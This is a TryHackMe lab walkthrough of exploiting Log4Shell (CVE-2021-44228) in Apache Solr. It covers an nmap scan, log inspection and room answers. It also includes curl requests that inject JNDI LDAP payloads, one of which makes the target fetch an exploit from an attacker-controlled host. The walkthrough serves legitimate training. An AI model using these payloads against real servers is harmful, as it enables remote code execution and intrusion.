Banner

CVE-2021-44228 Apache Solr 8.11.1

Exploiting log4j
┌──(rfs㉿PopLabSec)-[~/HackTheBox/THM_Solar]
└─$ nmap solar.thm -p- -sC -sV
Exploiting log4j

What service is running on port 8983? (Just the name of the software)

Apache Solr

Open the service running on port 8983 in your browser:

┌──(rfs㉿PopLabSec)-[~/HackTheBox/THM_Solar]
└─$ firefox http://solar.thm:8983
Exploiting log4j
SOLR GUI

What is the -Dsolr.log.dir argument set to, displayed on the front page?

/var/solr/logs

Which file includes contains this repeated entry? (Just the filename itself, no path needed)

Exploiting log4j
solr.log

What “path” or URL endpoint is indicated in these repeated entries?

/admin/cores

Viewing these log entries, what field name indicates some data entrypoint that you as a user could control? (Just the field name)

params
┌──(rfs㉿PopLabSec)-[~/HackTheBox/THM_Solar]
└─$ curl 'http://solar.thm:8983/solr/admin/cores?foo=$\{jndi:ldap://10.8.154.49:9999\}'

What is the output of running this command? (You should leave this terminal window open as it will be actively awaiting connections)

Exploiting log4j
Listening on 0.0.0.0:1389
curl 'http://10.10.29.51:8983/solr/admin/cores?foo=$\{jndi:ldap://10.10.82.86:1389/Exploit\}'
python3 -m http.server
Exploiting log4j
Exploiting log4j
Exploiting log4j
Exploiting log4j

What is the full path of the specific solr.in.sh file?

/etc/default/solr.in.sh

https://tryhackme.com/room/solar

Categorized in:

TryHackMeHacking Playgrounds

Tagged in: